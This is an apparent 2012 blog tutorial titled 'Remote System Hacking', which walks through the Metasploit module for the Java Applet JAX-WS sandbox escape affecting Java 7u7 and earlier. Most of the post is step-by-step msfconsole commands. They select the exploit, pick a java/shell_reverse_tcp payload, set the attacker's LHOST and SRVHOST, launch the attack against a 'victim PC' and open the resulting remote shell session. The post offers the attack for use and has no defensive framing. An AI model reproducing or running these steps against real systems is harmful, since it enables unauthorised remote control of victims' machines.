Friday, December 14, 2012

Remote System Hacking using Java Applet JAX-WS


Java Applet JAX-WS Remote Code Execution

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Exploit Targets

  • 0 - Generic (Java Payload) (default)
  • 1 - Windows Universal
  • 2 - Linux x 86

Requirement :

Attacker :Backtrack
Victim PC : Windows 

Step 1: open terminal and type msfconsole



Step 1: Now use exploit/multi/browser/java_jre17_jaxws


Step 2 : search for the payload here we are using java/shell_reverse_tcp 
show options


set  the required options 
set LHOST 192.168.133.130
set SRVHOST 192.168.133.130
Now exploit 



Now list  the sessions by using sessions -l command to access the session use sessions -i 1 (session ID) 

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)